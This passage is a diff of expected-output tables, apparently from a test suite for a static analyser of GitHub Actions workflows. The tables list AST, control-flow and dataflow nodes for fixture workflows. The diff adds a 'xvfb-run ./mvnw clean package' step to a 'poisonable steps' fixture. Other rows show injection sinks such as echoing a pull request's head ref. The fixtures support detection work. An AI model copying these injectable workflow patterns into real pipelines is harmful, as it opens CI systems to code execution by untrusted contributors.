.github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -184,7 +186,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -337,82 +340,86 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -569,11 +576,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | @@ -606,8 +613,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -686,7 +695,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | @@ -719,8 +728,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -800,7 +811,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | @@ -833,8 +844,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby 